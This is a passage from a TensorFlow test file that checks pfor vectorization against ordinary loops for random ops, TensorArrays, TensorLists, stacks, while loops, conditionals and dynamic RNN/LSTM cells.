for i in range(n):
self.assertAllEqual(outputs[i].shape, outputs[i + n].shape)
# TODO(agarwal): add tests for other random functions
def test_multinomial(self):
seeds = [[1, 2], [3, 4]]
logits = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
logits_0 = array_ops.gather(logits, 0)
logits_i = array_ops.gather(logits, i)
seeds_0 = array_ops.gather(seeds, 0)
seeds_i = array_ops.gather(seeds, i)
return (stateless_random_ops.stateless_categorical(
logits=logits_i, num_samples=3, seed=seeds_i),
stateless_random_ops.stateless_categorical(
logits=logits_i, num_samples=3, seed=seeds_0),
stateless_random_ops.stateless_categorical(
logits=logits_0, num_samples=3, seed=seeds_i),
stateless_random_ops.stateless_categorical(
logits=logits_0, num_samples=3, seed=seeds_0))
self._test_loop_fn(loop_fn, 2)
class LoggingTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_print(self):
x = random_ops.random_uniform([3, 5])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return logging_ops.Print(
x1, [x1, "x1", array_ops.shape(x1)], summarize=10)
self._test_loop_fn(loop_fn, 3)
def test_assert(self):
def loop_fn(i):
return control_flow_ops.Assert(i < 10, [i, [10], [i + 1]])
# TODO(agarwal): make this work with for_loop.
with session.Session() as sess:
sess.run(pfor_control_flow_ops.pfor(loop_fn, 3))
class TensorArrayTest(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.disable_control_flow_v2()
super(TensorArrayTest, self).setUp()
def tearDown(self):
if self._enabled:
control_flow_v2_toggles.enable_control_flow_v2()
super(TensorArrayTest, self).tearDown()
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_read(self):
ta = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 0).write(1, 1)
def loop_fn(i):
return ta.read(i), ta.read(0)
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_gather(self):
ta = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 0).write(1, 1)
def loop_fn(i):
return ta.gather([i]), ta.gather([0, 1])
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_outside_and_write_and_scatter(self):
t = tensor_array_ops.TensorArray(dtypes.int32, 10, clear_after_read=False)
handle = t.handle
def loop_fn(i):
ta = t.write(i + 2, 2 * i).write(i, 5)
ta = ta.scatter([4 + i], [4]).scatter([6 + i, 8 + i], [6 + i, 8 + i])
return ta.flow
t1 = pfor_control_flow_ops.pfor(loop_fn, iters=2)
out1 = tensor_array_ops.TensorArray(
dtypes.int32, handle=handle, flow=t1[-1]).stack()
output1 = self._run_targets(out1)
t2 = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, iters=2)
out2 = tensor_array_ops.TensorArray(
dtypes.int32, handle=handle, flow=t2[-1]).stack()
output2 = self._run_targets(out2)
self.assertAllClose(output2, output1)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_write(self):
def loop_fn(i):
# TODO(agarwal): switching the order of writes to ta1 does not work.
ta1 = tensor_array_ops.TensorArray(dtypes.int32, 2).write(0,
i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(dtypes.int32, 1).write(0, 1)
return ta1.stack(), ta2.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_scatter(self):
def loop_fn(i):
# TODO(agarwal): switching the order of scatter to ta1 does not work.
ta1 = tensor_array_ops.TensorArray(dtypes.int32,
2).scatter([0],
[[i, 2]]).scatter([1],
[[1, 2]])
ta2 = tensor_array_ops.TensorArray(dtypes.int32,
2).scatter([0], [3]).scatter([1], [4])
return ta1.stack(), ta2.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_read(self):
def loop_fn(i):
ta1 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 1).write(1, 2)
# TODO(agarwal): ta1.read(i) currently is not supported.
return ta1.read(0), ta2.read(0), ta2.read(i)
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_create_inside_and_gather(self):
def loop_fn(i):
ta1 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, i).write(1, 1)
ta2 = tensor_array_ops.TensorArray(
dtypes.int32, 2, clear_after_read=False).write(0, 1).write(1, 2)
# TODO(agarwal): ta1.read(i) currently is not supported.
return ta1.gather([0, 1]), ta2.gather([0, 1]), ta2.gather([i])
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_grad(self):
x = random_ops.random_uniform([3, 2])
ta = tensor_array_ops.TensorArray(
dtypes.float32, 3, clear_after_read=False).unstack(x)
y = math_ops.square(ta.stack())
def loop_fn(i):
y_i = array_ops.gather(y, i)
grad = gradient_ops.gradients(y_i, x)[0]
return array_ops.gather(grad, i)
t1 = pfor_control_flow_ops.pfor(loop_fn, iters=3)
# y = x * x. Hence dy/dx = 2 * x.
actual_grad = 2.0 * x
with session.Session() as sess:
actual_grad, computed_grad = sess.run([t1, actual_grad])
self.assertAllClose(actual_grad, computed_grad)
@test_util.run_all_in_graph_and_eager_modes
class TensorListTest(PForTestCase):
def test_create_outside_and_write(self):
handle1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
def loop_fn(i):
h1 = list_ops.tensor_list_set_item(handle1, 0, i)
h1 = list_ops.tensor_list_set_item(h1, 1, 1)
h2 = list_ops.tensor_list_set_item(handle2, 0, 1)
return (list_ops.tensor_list_stack(h1, dtypes.int32),
list_ops.tensor_list_stack(h2, dtypes.int32))
self._test_loop_fn(loop_fn, 3)
def test_create_inside_and_write(self):
def loop_fn(i):
h1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
h1 = list_ops.tensor_list_set_item(h1, 0, i)
h1 = list_ops.tensor_list_set_item(h1, 1, 1)
h2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
h2 = list_ops.tensor_list_set_item(h2, 0, 1)
return (list_ops.tensor_list_stack(h1, dtypes.int32),
list_ops.tensor_list_stack(h2, dtypes.int32))
self._test_loop_fn(loop_fn, 3)
def test_create_outside_and_read(self):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle = list_ops.tensor_list_set_item(handle, 0, 0)
handle = list_ops.tensor_list_set_item(handle, 1, 1)
def loop_fn(i):
return (list_ops.tensor_list_get_item(handle, i, dtypes.int32),
list_ops.tensor_list_get_item(handle, 0, dtypes.int32),
list_ops.tensor_list_length(handle),
list_ops.tensor_list_element_shape(handle, dtypes.int32),
list_ops.tensor_list_element_shape(handle, dtypes.int64))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_read(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
handle = list_ops.tensor_list_set_item(handle, 0, i)
handle = list_ops.tensor_list_set_item(handle, 1, 1)
return (list_ops.tensor_list_get_item(handle, 0, dtypes.int32),
list_ops.tensor_list_get_item(handle, i, dtypes.int32),
list_ops.tensor_list_length(handle),
list_ops.tensor_list_element_shape(handle, dtypes.int32),
list_ops.tensor_list_element_shape(handle, dtypes.int64))
self._test_loop_fn(loop_fn, 2)
def test_create_outside_and_scatter(self):
h = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
def loop_fn(i):
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=h)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return list_ops.tensor_list_stack(handle, dtypes.int32)
self._test_loop_fn(loop_fn, 3)
def test_create_inside_and_scatter(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return list_ops.tensor_list_stack(handle, dtypes.int32)
self._test_loop_fn(loop_fn, 3)
def test_create_outside_and_gather(self):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[2, 3]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
def loop_fn(i):
return (list_ops.tensor_list_gather(handle, [0, 1], dtypes.int32),
list_ops.tensor_list_gather(handle, [i], dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_gather(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return (list_ops.tensor_list_gather(handle, [0, 1], dtypes.int32),
list_ops.tensor_list_gather(handle, [i], dtypes.int32))
self._test_loop_fn(loop_fn, 2)
def test_create_inside_and_concat(self):
def loop_fn(i):
handle = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=handle)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return gen_list_ops.tensor_list_concat_v2(
handle,
element_dtype=dtypes.int32,
element_shape=[2],
leading_dims=[])
output = pfor_control_flow_ops.pfor(loop_fn, 2)
self.assertAllClose([[0, 2, 1, 2], [1, 2, 1, 2]], output[0])
self.assertAllClose([[2, 2], [2, 2]], output[1])
def test_create_outside_and_concat(self):
h = list_ops.tensor_list_reserve([2], 2, dtypes.int32)
def loop_fn(i):
handle = list_ops.tensor_list_scatter([[i, 2]], [0], input_handle=h)
handle = list_ops.tensor_list_scatter([[1, 2]], [1], input_handle=handle)
return gen_list_ops.tensor_list_concat_v2(
handle,
element_dtype=dtypes.int32,
element_shape=[2],
leading_dims=[])
output = pfor_control_flow_ops.pfor(loop_fn, 2)
self.assertAllClose([[0, 2, 1, 2], [1, 2, 1, 2]], output[0])
self.assertAllClose([[2, 2], [2, 2]], output[1])
def test_tensor_list_from_tensor(self):
t = random_ops.random_uniform([2, 3, 4])
def loop_fn(i):
handle = list_ops.tensor_list_from_tensor(array_ops.gather(t, i), [4])
return list_ops.tensor_list_stack(handle, t.dtype)
self._test_loop_fn(loop_fn, 2)
def test_tensor_list_reserve_while_loop(self):
# Here a loop invariant TensorList is captured by a while_loop, which then
# performs loop dependent operations on it, resulting in a loop variant
# output. This forces stacking of the variant handle captured by the
# while_loop.
# We handle this particular case by forcing vectorization of
# TensorListReserve operation.
v2_enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
def loop_fn(i):
handle = list_ops.tensor_list_reserve([], 2, dtypes.int32)
_, out_handle = control_flow_ops.while_loop(
lambda j, _: j < 2, lambda j, h:
(j + 1, list_ops.tensor_list_set_item(h, j, i)), (0, handle))
return list_ops.tensor_list_stack(out_handle, dtypes.int32)
self._test_loop_fn(loop_fn, 2)
if not v2_enabled:
control_flow_v2_toggles.disable_control_flow_v2()
def test_tensor_list_addn_already_stacked(self):
def loop_fn(i):
l1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l1 = list_ops.tensor_list_set_item(l1, 0, i)
l2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l2 = list_ops.tensor_list_set_item(l2, 1, i)
return list_ops.tensor_list_stack(math_ops.add_n([l1, l2]), dtypes.int32)
self._test_loop_fn(loop_fn, 2)
def test_tensor_list_addn_stacking_required(self):
l1 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l1 = list_ops.tensor_list_set_item(l1, 1, 1)
def loop_fn(i):
l2 = list_ops.tensor_list_reserve([], 2, dtypes.int32)
l2 = list_ops.tensor_list_set_item(l2, 1, i)
return list_ops.tensor_list_stack(
math_ops.add_n([l1, l2]), dtypes.int32)
self._test_loop_fn(loop_fn, 2)
class StackTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_stack_inside_loop_invariant(self):
def loop_fn(_):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op1 = data_flow_ops.stack_push_v2(s, 1)
with ops.control_dependencies([op1]):
op2 = data_flow_ops.stack_push_v2(s, 2)
with ops.control_dependencies([op2]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e2]):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_stack_inside_push_loop_dependent(self):
def loop_fn(i):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op1 = data_flow_ops.stack_push_v2(s, i)
with ops.control_dependencies([op1]):
op2 = data_flow_ops.stack_push_v2(s, 2)
with ops.control_dependencies([op2]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e2]):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
self._test_loop_fn(loop_fn, 2)
@test_util.run_v1_only("b/122612051")
def test_stack_outside_pop(self):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
op = data_flow_ops.stack_push_v2(s, 5)
with ops.control_dependencies([op]):
op = data_flow_ops.stack_push_v2(s, 6)
with ops.control_dependencies([op]):
op = data_flow_ops.stack_push_v2(s, 7)
def loop_fn(_):
e1 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
with ops.control_dependencies([e1]):
e2 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
return e1, e2
with ops.control_dependencies([op]):
e1, e2 = pfor_control_flow_ops.pfor(loop_fn, iters=2)
with ops.control_dependencies([e1, e2]):
e3 = data_flow_ops.stack_pop_v2(s, elem_type=dtypes.int32)
v1, v2, v3 = self._run_targets([e1, e2, e3], run_init=False)
self.assertAllEqual([7, 7], v1)
self.assertAllEqual([6, 6], v2)
self.assertAllEqual(5, v3)
@test_util.run_v1_only("b/122612051")
def test_stack_outside_push(self):
s = data_flow_ops.stack_v2(max_size=4, elem_type=dtypes.int32)
def loop_fn(_):
return data_flow_ops.stack_push_v2(s, 7)
with self.assertRaisesRegex(ValueError, "StackPushV2 not allowed.*"):
pfor_control_flow_ops.pfor(loop_fn, iters=2)
# TODO(agarwal): test nested while_loops. This currently requires converting a
# tf.cond.
class WhileV1Test(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.disable_control_flow_v2()
super(WhileV1Test, self).setUp()
def tearDown(self):
if self._enabled:
control_flow_v2_toggles.enable_control_flow_v2()
super(WhileV1Test, self).tearDown()
def test_while_outside_loop(self):
x = control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
def loop_fn(i):
return x + i
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_invariant_while(self):
def loop_fn(_):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_invariant_while_with_control_dependency(self):
def loop_fn(i):
with ops.control_dependencies([i]):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1,
[0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_with_stateful_ops(self):
def loop_fn(_):
return control_flow_ops.while_loop(
lambda j, x: j < 4, lambda j, x:
(j + 1, x + random_ops.random_uniform([])), [0, 0.])[0]
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_unstacked_condition(self):
def loop_fn(i):
return control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + i), [0, 0])
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while(self):
x = random_ops.random_uniform([3, 5])
lengths = constant_op.constant([4, 0, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
lengths_i = array_ops.gather(lengths, i)
_, total = control_flow_ops.while_loop(
lambda j, _: j < lengths_i, lambda j, t:
(j + 1, t + array_ops.gather(x_i, j)), [0, 0.])
return total
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_while_jacobian(self):
x = random_ops.random_uniform([1, 3])
y = random_ops.random_uniform([3, 3])
# out = x @ y @ y @ y @ y, where @ is matmul operator.
_, out = control_flow_ops.while_loop(
lambda i, _: i < 4, lambda i, out: (i + 1, math_ops.matmul(out, y)),
[0, x])
def loop_fn(i):
out_i = array_ops.gather(out, i, axis=1)
return array_ops.reshape(gradient_ops.gradients(out_i, x)[0], [-1])
out = pfor_control_flow_ops.pfor(loop_fn, iters=3)
# The above code does not work with tf.while_loop instead of pfor. So we
# manually compute the expected output here.
# Note that gradient of output w.r.t is (y @ y @ y @ y)^T.
expected_output = y
for _ in range(3):
expected_output = math_ops.matmul(expected_output, y)
expected_output = array_ops.transpose(expected_output, [1, 0])
with session.Session() as sess:
out, expected = sess.run([out, expected_output])
self.assertAllClose(expected, out)
@test_util.run_v1_only("b/122612051")
def test_tensor_array_as_loop_variable(self):
def loop_fn(i):
def body(j, ta):
ta = ta.write(j, i + j * j)
return j + 1, ta
_, ta = control_flow_ops.while_loop(
lambda j, _: j < 4, body,
(0, tensor_array_ops.TensorArray(dtypes.int32, size=4)))
return ta.stack()
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_read_tensor_array_partitioned_indices(self):
# Note that tensor array values are pfor loop dependent, and the while loop
# termination condition is also dependent on pfor iteration.
def loop_fn(i):
ta = tensor_array_ops.TensorArray(dtypes.int32, size=6)
ta = ta.unstack(i + list(range(5)))
def body(j, s):
return j + 1, s + ta.read(j)
_, s = control_flow_ops.while_loop(lambda j, _: j < i, body, (0, 0))
return s
self._test_loop_fn(loop_fn, 3)
@test_util.run_v1_only("b/122612051")
def test_external_while_loop_grad(self):
# Here we test that external while_loops that are extended from inside pfor
# (due to gradient calls) are not actually converted. If the below was
# converted all pfor iterations would write to the same tensor array
# indices.
x = constant_op.constant(1.)
def body(j, ta):
ta = ta.write(j, x)
return j + 1, ta
_, ta = control_flow_ops.while_loop(
lambda j, _: j < 4, body,
(0, tensor_array_ops.TensorArray(dtypes.float32, size=4)))
out = ta.stack()
def loop_fn(i):
out_i = array_ops.gather(out, i)
return gradient_ops.gradients(out_i, x)[0]
with session.Session() as sess:
# out is [x, x, x]. Hence the gradients should be [1, 1, 1].
self.assertAllEqual([1, 1, 1],
sess.run(pfor_control_flow_ops.pfor(loop_fn, 3)))
@test_util.run_v1_only("b/122612051")
def test_tensor_array_grad(self):
inp = constant_op.constant(np.random.rand(3, 4, 2), dtype=dtypes.float32)
ta = tensor_array_ops.TensorArray(dtypes.float32, size=3)
ta = ta.unstack(inp)
def loop_fn(i):
def body(j, x):
value = ta.gather([j])
value = array_ops.gather(array_ops.reshape(value, [4, 2]), i)
return j + 1, x + value
_, out = control_flow_ops.while_loop(lambda j, _: j < 3, body,
(0, array_ops.zeros([2])))
out = math_ops.reduce_prod(out)
return out, gradient_ops.gradients(out, inp)[0]
pfor_out, pfor_out_grad = pfor_control_flow_ops.pfor(loop_fn, 4)
# Note that tf.while_loop does not work in the setup above. So we manually
# construct the equivalent computation of the above loops here.
real_out = math_ops.reduce_sum(inp, axis=[0])
real_out = math_ops.reduce_prod(real_out, axis=[1])
# Note that gradients of real_out will accumulate the gradients across the
# output value. Hence we do the same aggregation on pfor_out_grad.
real_out_grad = gradient_ops.gradients(real_out, inp)[0]
sum_pfor_out_grad = math_ops.reduce_sum(pfor_out_grad, axis=[0])
with session.Session() as sess:
v1, v2, v1_grad, v2_grad = sess.run(
[pfor_out, real_out, sum_pfor_out_grad, real_out_grad])
self.assertAllClose(v1, v2)
self.assertAllClose(v1_grad, v2_grad)
def dynamic_lstm_input_fn(batch_size, state_size, max_steps):
# We make inputs and sequence_length constant so that multiple session.run
# calls produce the same result.
inputs = constant_op.constant(
np.random.rand(batch_size, max_steps, state_size), dtype=dtypes.float32)
sequence_length = np.random.randint(0, size=[batch_size], high=max_steps + 1)
sequence_length = constant_op.constant(sequence_length, dtype=dtypes.int32)
return inputs, sequence_length
def create_dynamic_lstm(cell_fn, batch_size, state_size, max_steps):
cell = cell_fn(state_size)
inputs, sequence_length = dynamic_lstm_input_fn(batch_size, state_size,
max_steps)
inputs_ta = tensor_array_ops.TensorArray(
dtypes.float32, size=max_steps, element_shape=[batch_size, state_size])
inputs_time_major = array_ops.transpose(inputs, [1, 0, 2])
inputs_ta = inputs_ta.unstack(inputs_time_major)
zeros = array_ops.zeros([state_size])
def loop_fn(i):
sequence_length_i = array_ops.gather(sequence_length, i)
def body_fn(t, state, ta):
inputs_t = array_ops.expand_dims(
array_ops.gather(inputs_ta.read(t), i), 0)
output, new_state = cell(inputs_t, state)
output = array_ops.reshape(output, [-1])
# TODO(agarwal): one optimization that dynamic_rnn uses is to avoid the
# array_ops.where when t < min(sequence_length). Doing that requires
# supporting tf.cond pfor conversion.
done = t >= sequence_length_i
output = array_ops.where(done, zeros, output)
ta = ta.write(t, output)
new_state = [
array_ops.where(done, s, ns)
for s, ns in zip(nest.flatten(state), nest.flatten(new_state))
]
new_state = nest.pack_sequence_as(state, new_state)
return t + 1, new_state, ta
def condition_fn(t, _, unused):
del unused
return t < max_steps
initial_state = cell.zero_state(1, dtypes.float32)
_, state, ta = control_flow_ops.while_loop(condition_fn, body_fn, [
0, initial_state,
tensor_array_ops.TensorArray(dtypes.float32, max_steps)
])
new_state = [array_ops.reshape(x, [-1]) for x in nest.flatten(state)]
new_state = nest.pack_sequence_as(initial_state, new_state)
return ta.stack(), new_state
pfor_output = pfor_control_flow_ops.pfor(loop_fn, batch_size)
tf_output = rnn.dynamic_rnn(
cell,
inputs,
sequence_length=sequence_length,
initial_state=cell.zero_state(batch_size, dtypes.float32))
return pfor_output, tf_output
@test_util.run_all_in_graph_and_eager_modes
class WhileV2Test(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
super(WhileV2Test, self).setUp()
def tearDown(self):
if not self._enabled:
control_flow_v2_toggles.disable_control_flow_v2()
super(WhileV2Test, self).tearDown()
def test_while_outside_loop(self):
def _f():
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
def loop_fn(i):
return _f() + i
self._test_loop_fn(loop_fn, 3)
def test_invariant_while(self):
def loop_fn(_):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
self._test_loop_fn(loop_fn, 3)
def test_invariant_while_with_control_dependency(self):
def loop_fn(i):
with ops.control_dependencies([i]):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1,
[0])
self._test_loop_fn(loop_fn, 3)
def test_while_with_stateful_ops(self):
def loop_fn(_):
j, _ = control_flow_ops.while_loop(
lambda j, x: j < 4, lambda j, x:
(j + 1, x + random_ops.random_uniform([])), [0, 0.])
return j
self._test_loop_fn(loop_fn, 3)
def test_while_with_variable(self):
v = resource_variable_ops.ResourceVariable(5.)
def loop_fn(_):
_, output = control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + v), [0, 0.])
return output
self._test_loop_fn(loop_fn, 3)
def test_while_unstacked_condition(self):
def loop_fn(i):
return control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + i), [0, 0])
self._test_loop_fn(loop_fn, 3)
def test_while(self):
x = random_ops.random_uniform([3, 5])
lengths = constant_op.constant([4, 0, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
lengths_i = array_ops.gather(lengths, i)
return control_flow_ops.while_loop(
lambda j, _: j < lengths_i, lambda j, t:
(j + 1, t + array_ops.gather(x_i, j)), [0, 0.])
self._test_loop_fn(loop_fn, 3)
def test_while_change_input_invariance(self):
# This tests cases where a loop invariant input to while has loop dependent
# operations applied to it inside the while body.
# It also test inputs that are passed through.
def loop_fn(i):
return control_flow_ops.while_loop(
lambda j, *_: j < i, lambda j, x, y, z, w:
(j + 1, x + i, y + x, z, w), [
0,
constant_op.constant(0),
constant_op.constant(1), i,
constant_op.constant(2)
])
self._test_loop_fn(loop_fn, 3)
def test_while_shape_invariants(self):
def loop_fn(i):
return control_flow_ops.while_loop(
lambda j, *_: j < 4,
lambda j, x, y: (j + 1, x + i, y + 1),
[0, constant_op.constant([0, 1]),
constant_op.constant([2, 3])],
shape_invariants=[
None,
tensor_shape.TensorShape([2]),
tensor_shape.TensorShape([2])
])
self._test_loop_fn(loop_fn, 3)
def test_while_jacobian(self):
# Note that we wrap the code below in a tf.function since we don't want the
# while_loop call to be evaluated eagerly using a python loop.
@def_function.function
def _f(x, y, use_pfor):
# out = x @ y @ y @ y @ y, where @ is matmul operator.
_, out = control_flow_ops.while_loop(
lambda i, _: i < 4, lambda i, out: (i + 1, math_ops.matmul(out, y)),
[0, x])
def loop_fn(i):
out_i = array_ops.gather(out, i, axis=1)
grad = gradient_ops.gradients(out_i, x)
return array_ops.reshape(grad[0], [-1])
if use_pfor:
return pfor_control_flow_ops.pfor(loop_fn, iters=3)
else:
return pfor_control_flow_ops.for_loop(
loop_fn, iters=3, loop_fn_dtypes=out.dtype)
x = constant_op.constant(np.random.uniform(size=(1, 3)))
y = constant_op.constant(np.random.uniform(size=(3, 3)))
self.assertAllClose(_f(x, y, True), _f(x, y, False))
def test_scan(self):
np.random.seed(seed=42)
data = np.random.randn(3).astype(np.float32)
def log_prob(x):
return math_ops.reduce_sum(functional_ops.scan_v2(
lambda _, yi: (x - yi)**2,
elems=data,
initializer=constant_op.constant(0.)))
x = variables.Variable(array_ops.ones([2]))
self.evaluate(x.initializer)
v_log_prob = lambda x: pfor_control_flow_ops.vectorized_map(log_prob, x)
theoretical, numerical = gradient_checker_v2.compute_gradient(
v_log_prob, (x,), delta=1e-3)
self.assertAllClose(theoretical, numerical, rtol=1e-2)
@test_util.run_all_in_graph_and_eager_modes
class NestedControlFlowTest(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
super(NestedControlFlowTest, self).setUp()
def tearDown(self):
if not self._enabled:
control_flow_v2_toggles.disable_control_flow_v2()
super(NestedControlFlowTest, self).tearDown()
def _cond(self, f=None, split=0):
if f is None:
f = lambda x, y: (x, y)
def _f(x, y):
return control_flow_ops.cond(y > split, lambda: f(x, y), lambda:
(x + 1., y))
return _f
def _while(self, f=None):
if f is None:
f = lambda x, y: (x, y)
def _f(x, y):
return control_flow_ops.while_loop(
lambda j, _: j < y, lambda j, t:
(j + 1, t + array_ops.gather(f(x, y)[0], j)), [0, x])[1], y
return _f
def _test_helper(self, f):
x = random_ops.random_uniform([5, 5])
y = constant_op.constant([4, -1, 2, -2, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
return f(x_i, y_i)
self._test_loop_fn(loop_fn, 5)
def test_cond_while(self):
self._test_helper(self._cond(self._while()))
def test_while_cond(self):
self._test_helper(self._while(self._cond()))
def test_while_while(self):
self._test_helper(self._while(self._while()))
def test_cond_cond(self):
self._test_helper(self._cond(self._cond()))
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class StatelessIfTest(PForTestCase):
def test_loop_variant_cond(self):
x = [1, 2, 3, 4, 5.]
y = 2.5
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
# Note that the output has a combination of then and else branches being
# loop variant / invariant.
return cond_v2.cond_v2(x_i < y, lambda: (y - x_i, y, 1., 2.), lambda:
(x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
def test_loop_invariant_cond(self):
x = [1, 2, 3, 4, 5.]
y = 0.5
z = random_ops.random_uniform([])
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
# Note that the output has a combination of then and else branches being
# loop variant / invariant.
return cond_v2.cond_v2(z < y, lambda: (y - x_i, y, 1., 2.), lambda:
(x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
def test_empty_branch(self):
x = [1, 2, 3, 4, 5.]
y = 6.
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
return cond_v2.cond_v2(
x_i < y, # Note that else branch is empty.
lambda: (y - x_i, y, 1., 2.),
lambda: (x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class IfTest(PForTestCase):
def test_read_var(self):
self.skipTest("b/156438918") # Flaky
x = [1, 2, 3, 4, 5.]
y = 2.5
z = resource_variable_ops.ResourceVariable(5.)
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
return cond_v2.cond_v2(x_i < y, lambda: z - x_i, lambda: z + x_i)
self._test_loop_fn(loop_fn, iters=5)
class RNNTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_dynamic_rnn(self):
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicRNNCell, 3, 5,
7)
self.run_and_assert_equal(pfor_outputs, tf_outputs)
@test_util.run_v1_only("b/122612051")
def test_dynamic_lstm(self):
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicLSTMCell, 3, 5,
7)
self.run_and_assert_equal(pfor_outputs, tf_outputs)
# TODO(agarwal): benchmark numbers on GPU for graphs based on while_loop
# conversion don't look good. Some of it seems like lot of copies between host
# and device. Optimize that.
